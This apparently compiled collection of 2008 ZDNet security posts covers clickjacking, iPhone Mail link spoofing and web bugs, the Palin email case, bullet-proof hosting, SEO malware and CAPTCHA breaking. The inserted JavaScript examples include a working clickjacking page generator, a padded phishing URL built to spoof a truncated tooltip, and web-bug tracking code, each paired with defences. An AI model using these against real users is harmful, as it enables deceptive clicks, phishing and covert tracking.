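// Not code from the original post, Aharonovsky's game or Raff's Twitter demo.
// All coordinates and URLs below are made up for the demonstration.

// CSS for the invisible iframe. targetRect is where the real button renders inside
// the framed page; decoyRect is where our visible "Click Me!" renders. Shifting the
// iframe by (decoy - target) puts the real button exactly under the decoy.
function overlayStyle(targetRect, decoyRect, frameSize) {
  return {
    position: 'absolute',
    left: `${decoyRect.x - targetRect.x}px`,
    top: `${decoyRect.y - targetRect.y}px`,
    width: `${frameSize.width}px`,
    height: `${frameSize.height}px`,
    opacity: 0,   // invisible, yet still the topmost click target
    zIndex: 10,   // above the decoy (which sits at z-index 1)
    border: 0,
  };
}

// Where the framed site's button ends up on the attacker page after the shift.
function projectedTarget(targetRect, style) {
  return {
    x: targetRect.x + parseInt(style.left, 10),
    y: targetRect.y + parseInt(style.top, 10),
    width: targetRect.width,
    height: targetRect.height,
  };
}

// camelCase style object -> inline CSS string.
function toCss(style) {
  return Object.entries(style)
    .map(([k, v]) => `${k.replace(/[A-Z]/g, c => '-' + c.toLowerCase())}:${v}`)
    .join(';');
}

// Render the attacker page: a visible decoy and the transparent iframe on top of it.
function attackPage(targetUrl, targetRect, decoyRect, frameSize) {
  const style = overlayStyle(targetRect, decoyRect, frameSize);
  return [
    '<!DOCTYPE html><html><body>',
    `<button style="position:absolute;left:${decoyRect.x}px;top:${decoyRect.y}px;` +
      `width:${decoyRect.width}px;height:${decoyRect.height}px;z-index:1">Click Me!</button>`,
    `<iframe src="${targetUrl}" scrolling="no" style="${toCss(style)}"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// Defense: the classic frame-busting check a page like Twitter's could run.
// `win` is passed in so the logic can be exercised outside a browser; in a real
// page it is simply `window`. Returns true when a redirect was triggered.
function frameBust(win) {
  if (win.top !== win.self) {
    win.top.location = win.self.location;  // break out of the attacker's frame
    return true;
  }
  return false;
}

// Demo values (hypothetical): the "Follow" button renders at (500,120) inside the
// framed site; our decoy sits at (200,300) on the attacker page.
const TARGET_BUTTON = { x: 500, y: 120, width: 80, height: 24 };
const DECOY_BUTTON = { x: 200, y: 300, width: 80, height: 24 };
const FRAME_SIZE = { width: 1024, height: 800 };

console.log(attackPage('http://target.example/follow', TARGET_BUTTON, DECOY_BUTTON, FRAME_SIZE));
```

overlayStyle does the one thing every clickjacking page needs: translate the iframe by (decoy minus target) and make it transparent but on top, so the victim sees the decoy and clicks the framed page (Aharonovsky’s game gets the same effect by swapping z-index per click rather than using opacity). The frame-busting check is what sites relied on in 2008, and it is exactly what Zalewski calls hard to fix: a hostile parent page can interfere with the redirect, so it is a speed bump rather than a guarantee. Browsers later added the X-Frame-Options response header (first in IE8, early 2009), which lets a site refuse to be framed without depending on script.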

[Source: zdnet]

iPhone hits another security speedbump


Apple’s ongoing struggles with poor security-related design choices have extended to the iPhone. According to security researcher Aviv Raff, everyone’s favorite mobile device is vulnerable to two separate security weaknesses that expose millions of users to phishing and spamming attacks.


[ SEE: Apple hasn’t learned from past security mistakes ]

Raff, a bug finder who regularly reports flaws in modern Web browsers, discovered that it’s easy to mask a link to a malicious phishing Web site because of the way the iPhone’s Mail application handles the display of links.

When the mail message is in HTML format, the text of a link can be set to a different URL than the actual link. In most mail clients (e.g. on your PC or Mac), you can just hover over the link and get a tooltip which tells you the actual URL you are about to click.

On the iPhone it’s a bit different. You need to click the link for a few seconds in order to get the tooltip. Now, because the iPhone screen is small, long URLs are automatically cut off in the middle. So, instead of “hxxp://www.somedomain.com/verylongpath/verylongfilename”, you will get something like “www.somedomain.com/very…ilename” in the tooltip.

[ SEE: Apple patches 10 iPhone security holes ]

The problem here, Raff explains, is that an attacker can set a long subdomain (~24 characters) so that, when the URL is cut off in the middle, the visible part of the tooltip looks like a trusted domain while the request actually goes to the attacker’s host.
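As an added illustration, not Raff’s code, the following JavaScript simulates the middle truncation of a tooltip and shows the check a mail client (or a suspicious user) should make instead of trusting the rendered prefix. The head and tail lengths, the domain names and the URLs are assumptions chosen for the demo; the post does not document the exact cut point Mail uses.

```javascript
// Added example, not Raff's or Apple's code: simulate the tooltip truncation and
// show why the rendered prefix must not be trusted. The head/tail lengths below are
// an assumption (the exact cut point used by Mail is not documented here); all
// domain names are made up.

// Strip the scheme, then keep `head` leading and `tail` trailing characters with an
// ellipsis between them whenever the remainder is longer than head + tail + 1.
function truncateMiddle(url, head = 16, tail = 10) {
  const shown = url.replace(/^[a-z][a-z0-9+.-]*:\/\//i, '');
  if (shown.length <= head + tail + 1) return shown;
  return shown.slice(0, head) + '\u2026' + shown.slice(shown.length - tail);
}

// The part of the display a user reads as "the site": everything before the first
// slash or the ellipsis.
function displayedHost(display) {
  return display.split(/[\/\u2026]/)[0];
}

// What actually matters: the host the request will go to.
function realHost(url) {
  return new URL(url).hostname;
}

// Naive registrable domain: the last two DNS labels. Fine for the .example names
// used here; production code needs the Public Suffix List (assumption).
function registrableDomain(host) {
  return host.split('.').slice(-2).join('.');
}

// True when the truncated display reads as trustedDomain while the URL really
// resolves to a different registrable domain: the spoof described above.
function looksSpoofed(url, trustedDomain, head, tail) {
  const shownHost = displayedHost(truncateMiddle(url, head, tail));
  const hostMatches = shownHost === trustedDomain || shownHost.endsWith('.' + trustedDomain);
  return hostMatches && registrableDomain(realHost(url)) !== trustedDomain;
}

// Constructed URLs. In PHISH the trusted-looking name is only a subdomain of the
// attacker's host, padded so the cut falls right after it (Raff's ~24-character trick).
const PHISH = 'http://www.bank.example.' + 'a'.repeat(24) + '.attacker.example/login.html';
const LEGIT = 'http://www.bank.example/login.html';

console.log(truncateMiddle(PHISH), '->', realHost(PHISH));
console.log(truncateMiddle(LEGIT), '->', realHost(LEGIT));
```

The two console lines show the point: both URLs render as www.bank.example followed by login.html, and only the real hostname tells them apart. A client that wants to warn the user has to compare the registrable domain of the actual target, not the prefix it happened to have room to display.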

The spamming bug, described by Raff as “a pretty dumb design flaw,” allows the harvesting of “live” e-mail addresses simply by sending rigged images to targets checking e-mail on iPhones.

Whenever you view an HTML mail message which contains images, a request is made to a remote server in order to get the image. Most of the mail clients today require you to approve the download of the images. This is done for a good reason.

If the images were downloaded automatically, the spammer who controls the remote server would know that you have read the message, and would mark your mail account as active in order to send you more spam. This “feature” is also known as a “Web Bug”.

The iPhone’s Mail application downloads all images automatically, and there is NO WAY to disable this feature!
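As an added example, not from the post or from Raff, the following JavaScript shows both ends of a web bug and the client-side control the post says iPhone Mail lacks: the sender embeds a per-recipient pixel URL, the server marks the address as live when the pixel is fetched, and a client that asks before downloading images simply rewrites remote image sources so nothing is requested until the user agrees. Addresses and hostnames are constructed.

```javascript
// Added example, not from the post or from Raff: both ends of a "web bug" and the
// client-side control that iPhone Mail (per the post) does not offer. Addresses
// and hostnames are constructed for the demo.

// Sender side: a 1x1 image whose URL identifies the recipient. Real campaigns use
// an opaque token mapped to the address server-side; the address itself is used
// here so the round trip stays visible.
function webBugTag(trackerBase, recipient) {
  return `<img src="${trackerBase}/pixel.gif?id=${encodeURIComponent(recipient)}" ` +
         'width="1" height="1" alt="">';
}

// Server side: a pixel request proves the message was rendered. Returns the
// address marked live, or null for unrelated requests. `liveAccounts` is a
// Map address -> number of opens observed.
function recordOpen(requestUrl, liveAccounts) {
  const u = new URL(requestUrl, 'http://tracker.invalid'); // base only for relative paths
  const id = u.searchParams.get('id');                      // already percent-decoded
  if (u.pathname !== '/pixel.gif' || !id) return null;
  liveAccounts.set(id, (liveAccounts.get(id) || 0) + 1);
  return id;
}

// Client side: what "ask before loading remote images" amounts to. Remote image
// sources are moved to a data attribute so nothing is fetched until the user
// opts in; inline data: images are left untouched.
function blockRemoteImages(html) {
  return html.replace(/(<img\b[^>]*?)\ssrc=(["'])(https?:\/\/[^"']*)\2/gi,
                      '$1 data-blocked-src=$2$3$2');
}

// Constructed message as a spammer would send it.
const RECIPIENT = 'alice@mail.example';
const MESSAGE = '<p>Hello!</p>' + webBugTag('http://tracker.example', RECIPIENT);

// Walk-through: a client that auto-loads images fetches the pixel and the tracker
// learns that RECIPIENT is live; a client that blocks remote images never sends
// the request at all.
const live = new Map();
recordOpen(MESSAGE.match(/src="([^"]+)"/)[1], live);
console.log(live);
console.log(blockRemoteImages(MESSAGE));
```

Nothing about the pixel is special: any remote resource referenced from the mail (a stylesheet, a background image) leaks the same signal, which is why the control has to block all remote fetches rather than just image tags, and why a client with no such switch, as the post describes for iPhone Mail, leaks on every open.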

[ SEE: Apple caught neglecting iPhone security ]

Raff said he provided details of these issues to Apple more than two months ago.

I’ve asked Apple several times for a schedule, but they have refused to provide the fix date. Three versions (v2.0.1, v2.02, v2.1) have been released since I provided them with the details, and they are still “working on it”. Therefore, I’ve decided to publicly disclose the technical details.

Separately, there’s an unpatched SMS privacy hole when the iPhone is placed in emergency call mode.

Apple is notoriously slow to fix iPhone flaws so if you’re nervous about these risks, you should be very careful when using Mail on the device.

[Source: zdnet]

Adobe posts workaround for clickjacking flaw, NoScript releases ClearClick

Following the recent release of a PoC demonstrating clickjacking in action, Adobe has released a security advisory offering workarounds for customers and IT administrators to deal with the flaw until it ships a Flash Player patch, promised before the end of October.

“We have just posted a Security Advisory for Flash Player in response to recently published reports of a ‘Clickjacking’ issue in multiple web browsers that could allow an attacker to lure a web browser user into unknowingly clicking on a link or dialog. This potential ‘Clickjacking’ browser issue affects Adobe Flash Player’s microphone and camera access dialog. A Flash Player update to mitigate the issue will be available before the end of October. In the meantime, users can apply the workaround described in the Advisory.”

And since prevention is better than the cure, at least in the short term, the just-released NoScript v1.8.2.1 aims to provide exactly that with its ClearClick feature:

“The most specific and ambitious is called ClearClick: whenever you click or otherwise interact, through your mouse or your keyboard, with an embedded element which is partially obstructed, transparent or otherwise disguised, NoScript prevents the interaction from completing and reveals the real thing to you in “clear”. At that point you can evaluate whether the click target was actually the intended one, and decide whether to keep it locked or unlock it for free interaction. This comes in quite handy now that more dangerous usages of clickjacking are being disclosed, such as enabling your microphone or your webcam behind your back to spy on you through the interwebs.”

Click in the clear, and make sure you’re not susceptible to exploitation through last quarter’s security vulnerabilities.

[Source: zdnet]

Student indicted for Palin e-mail hack

The U.S. Justice Department today announced that a federal grand jury in Knoxville, Tennessee has indicted the 20-year-old son of a state lawmaker in connection with the compromise of Sarah Palin’s Yahoo e-mail account.

David Kernell, who has for a while been identified as the alleged hacker, is expected to be arraigned today before U.S. Magistrate Judge C. Clifford Shirley.

From the announcement:

The single count indictment, returned on Oct. 7, 2008, and unsealed today, alleges that on approximately Sept. 16, 2008, Kernell, a resident of Knoxville, obtained unauthorized access to Gov. Palin’s personal e-mail account by allegedly resetting the account password. According to the indictment, after answering a series of security questions that allowed him to reset the password and gain access to the e-mail account, Kernell allegedly read the contents of the account and made screenshots of the e-mail directory, e-mail content and other personal information. According to the indictment, Kernell posted screenshots of the e-mails and other personal information to a public Web site. Kernell also allegedly posted the new e-mail account password that he had created, thus providing access to the account by others.

[ SEE: Sarah Palin’s Yahoo account hijacked, e-mails posted online ]

Kernell faces a maximum of five years in prison, a $250,000 fine and a three-year term of supervised release.

* Photo credit: LA Times.

[Source: zdnet]

Atrivo/Intercage’s disconnection briefly disrupts spam levels

After years of operation, the California-based ISP Atrivo/Intercage, a well-known Russian Business Network darling, faced the music and was disconnected from the Internet by its upstream provider at the end of September. What happened, according to MessageLabs’s latest intelligence report, was a brief decline in spam because the malware-infected hosts could no longer reach the ISP’s netblock. Logically, within the next couple of days Intercage’s customers switched the hosting locations of their botnets’ command and control servers, and cybercrime activity quickly got back to normal:

“Charged with providing a safe-haven for online scammers, cyber crooks and malware distributors, California-based ISP Intercage (aka Atrivo) was disconnected from the internet on September 20. Pacific Internet Exchange, Intercage’s upstream provider, terminated the service and after a few days, UnitedLayer, another service provider, agreed to host Intercage. But on September 25, after deciding Intercage still had too many on-going problems, UnitedLayer also terminated service.

It can be seen from the chart above that the botnet controllers are quick to respond to any degradation of their service, and can re-point their bots at a new command and control channel in a matter of days. Therefore MessageLabs expects this decline in spam to be short-lived, especially in anticipation of Halloween in October and Thanksgiving in the US in November, both of which are traditionally seasonal favorites for spammers.”

What’s particularly disturbing in Intercage’s case is not just that it is a U.S.-based ISP, which undermines the “lack of international cybercrime cooperation” excuse for not shutting it down earlier, but also that Atrivo/Intercage’s uptime is a great example of how marginal thinking, and the relatively long average time it takes to shut such providers down, keep their business in the game. How come? Over the past year, Atrivo/Intercage has had 10 different upstream providers, so, contrary to the common wisdom that being on the run makes your job harder, it doesn’t really matter: the average time Atrivo manages to stay online seems to exceed what its customers need for their campaigns:

“The following graph shows that Atrivo has had 10 different Internet providers over the past year. The number of Renesys peers selecting each provider is shown over time. Most providers didn’t stick around for long, but a few like WV Fiber (AS 19151) did hang in there for much of the year. For a couple of days recently, Atrivo had zero providers and were hence effectively out of business, but then United Layer (AS 23342) became their latest — and currently only — provider. We’ll see how long this lasts and if others step up to provide Atrivo with some redundancy. Of course, those who are convinced Atrivo is up to no good can simply block access to their IP addresses (prefixes) as they have a relatively modest allocation.”

Do bullet-proof, cybercrime-friendly providers have a future? Naturally, since simple market forces are going to keep both sides busy for years to come. With Atrivo/Intercage now shut down, what’s next? Lessons learned for the bad guys: it’s about time they started applying basic OPSEC (operational security) practices such as decentralizing their networks and extending the lifecycle of their customers’ cybercrime activities by taking advantage of fast-flux hosting. The bottom line: Intercage may remain offline, but the concepts of cybercrime content hosting, and the Russian Business Network as a franchise, are always going to be there.

[Source: zdnet]

Talkback Tuesday: Mobile Malware

Last week I wrote two posts about why I was not concerned about mobile malware right now, but I expected mobile malware to become a problem in the near future. There were several responses to the two posts, including the following:

Phatkat writes:

Most crackers (hackers gone bad) are doing this for monetary gain, so like most people they want to put in the minimal amount of effort to get the maximum gain. Mobile devices are such a diverse group of devices that crackers haven’t found the “maximum economic benefit” in cracking any one type of mobile device.

I 100% agree with this statement, particularly when we define mobile malware as being an endemic security threat. There will always be proof-of-concept attacks against one platform or another, but the point in time where you have to worry is when real money and real time is being lost.

More importantly, there are plenty of security threats associated with mobile devices that have nothing to do with malware. Any CSO worth his salt should prioritize real, quantifiable threats over imaginary ones. Of the real threats, data leakage prevention is probably the biggest sector that comes to mind. Dealing with lost sensitive corporate data is a real security problem that requires real technology to handle. The present problems may not be as sexy as computer viruses, but they are problems that do need to be solved.

[Source: zdnet]

Dropping the iPhone NDA is good for security

Last week Apple lifted its NDA on iPhone developers, freeing them to discuss amongst themselves how to properly build applications. This decision is a “good thing” not just for applications but also for application security on the iPhone.

The iPhone NDA was antithetical to how developers work. Developers learn from code snippets and design patterns. They rarely invent functions from scratch, and will look at how previous applications were built to decide how to build their current projects. This isn’t because developers are unimaginative, but because they recognize there are a million ways of doing something but only a handful are efficient, effective, and ultimately won’t cause a security event that will bite you in the rear somewhere down the road.

Over the past decade, developers and security consultants have worked to fix millions of lines of code that were created without an understanding of their possible security implications. Software vulnerabilities with names like “buffer overflow” and “double free” are the result of improper coding practices. The software development community started to produce programming guides containing code that describes the right and wrong way of handling C strings, SQL queries and cryptography. Without this open discussion, we would still be fighting basic programming flaws in widespread binaries, something that largely tailed off several years ago.

I don’t know if there are any programming flaw syndromes that are already present in iPhone applications. I would be surprised if there were any, given the programming language used for iPhone apps as well as their use profile. If flaws were to come up, though, having an NDA on programming techniques would make the flaws far more difficult to repair.

[Source: zdnet]

Cybercriminals syndicating Google Trends keywords to serve malware

In an underground ecosystem that is anything but old-fashioned when it comes to abusing legitimate web services, cybercriminals have started exploiting traffic momentum: by monitoring the peak traffic for popular search queries using Google Trends, they syndicate the keywords in order to capture the traffic and direct it to malware-serving blogs, primarily hosted at Windows Live Spaces.

According to a recent advisory issued by Webroot :

“For the first time, hackers are capitalizing on the top news stories from Google Trends Labs, which lists the day’s most frequently searched topics, which can include news of the Wall St. bail out or the presidential campaign,” said Paul Piccard, director of Threat Research, Webroot. “These highly relevant news stories and videos are being posted to the hackers’ fake blogs to increase the site’s Google search rankings.

These fraudulent blogs contain several video links about the news story for which the users were originally searching. Once a user clicks on one of the video links, they are prompted to download a video codec that downloads a rogue antispyware program designed to goad the user into purchasing an illegitimate program that may put their personal information and data at even greater risk. “

Let’s take a sample, and confirm the ongoing syndication of popular keywords in order to attract traffic to the several hundred malware serving blogs.

A random keyword that is currently “on fire”, like gwen ifill wheelchair, shows that 55 minutes ago a malware-serving blog was successfully crawled and is now appearing within the first 10 results, thanks to the high PageRank of Windows Live Spaces. Upon clicking the link, the user is presented with the typical ActiveX Object Error message that attempts to trick them into installing TrojanDownloader:Win32/Zlob.AMV, which 10 out of 36 AV scanners currently detect (27.78%).

Moreover, in order to ensure that their fake blogs get crawled in the shortest time frame possible, so that they can better abuse the peak momentum of the search query, they naturally take advantage of pre-registered blogs at popular blogging platforms, which Google crawls practically in real time. Syndicating this particular keyword in order to serve malware is not an isolated event: several hundred currently active blogs do exactly the same as soon as Google Trends refreshes its hourly feed.

Malware campaigns have been taking advantage of SEO (search engine optimization), mostly blackhat SEO techniques, throughout 2008. The difference between the ongoing campaign and previous ones is that the current approach has a higher probability of attracting generic search traffic, since it relies on the world’s most popular search engine to tip the attackers off about what the world has been searching for during the past hour.

[Source: zdnet]

Well, I do actually worry (about mobile viruses)

In response to Kaspersky’s statement that they were concerned about mobile malware, I provided a flurry of reasons why mobile malware epidemics don’t occur today. This may not be the case in the near future, however, as changes in the handset space are making the creation of malware far more attractive.

Consumers lusting over the iPhone are driving changes in the handset space that will make the platforms far more attractive for malware authors. Over the next few years, we will see nearly every phone with high quality displays and effective browsers, running operating systems that can support third party applications. Customers will want to use these features; financial institutions, such as Bank of America, are responding by adding mobile features to their websites. Handsets that support these features are more expensive, and will end up being in use far longer, accumulating bugs along the way. And finally, the malware landscape is becoming increasingly competitive on the PC side, which will force malware authors to find fertile ground. The only piece missing is an effective monetization strategy for mobile malware (say that three times fast) that would make the labor profitable.

My thoughts about mobile malware are very similar to those about Mac malware. It isn’t a problem now, but if current trends continue it will be a problem in the future. It is not a question of if, but when, and those of us who are responsible for keeping our systems and handsets clean have to be prepared.

[Source: zdnet]

Spammers attacking Microsoft’s CAPTCHA — again

Never let a human do a malware-infected host’s CAPTCHA recognition job. On their way to abusing DomainKeys-verified server reputation in order to increase the probability of their spam emails reaching the recipients, spammers and malware authors are once again attempting to break Microsoft’s “revisited” CAPTCHA, and are able to sign up Live Hotmail accounts with a success rate of 10% to 15%, according to an assessment published by Websense today:

“Spammers are once again targeting Microsoft’s Hotmail (Live Hotmail) services. We have discovered that spammers, in a recent aggressive move, have managed to create automated bots that can sign up for and create random Hotmail accounts, defeating Microsoft’s latest, revised CAPTCHA system. The accounts are then used to send mass-mailings.

Early this year (2008), as reported by Websense Security Labs, spammers on a worldwide basis demonstrated their adaptability by defeating a range of anti-spam services offered by security vendors, carrying out streamlined anti-CAPTCHA operations on Microsoft’s Live Mail, Google’s Gmail, Microsoft’s Live Hotmail, Google’s Blogger and Yahoo Mail.”

A 10% to 15% recognition rate, or “one in every 8 to 10 attempts to sign up for a Live Hotmail account is successful” as stated by Websense, is a rather modest success rate given that the academic community has achieved a 92% recognition rate in the past. But with hundreds of thousands of malware-infected hosts at their disposal, the spammers appear willing to allocate the resources despite the modest success rate, and are actively spamming through the newly registered bogus email accounts.

Is machine-learning CAPTCHA breaking the tactic of choice, or is the recently uncovered CAPTCHA-solving economy, an outsourcing model, cost-effective enough to undermine the machine-learning approach? With low-waged humans achieving a 100% recognition rate and processing “bogus account registration” orders, it may in fact be more cost-effective for a cybercriminal to outsource the process than to allocate their own resources and achieve a lower success rate. One thing’s for sure: CAPTCHA-based authentication has been persistently under attack from all fronts throughout 2008.

[Source: zdnet]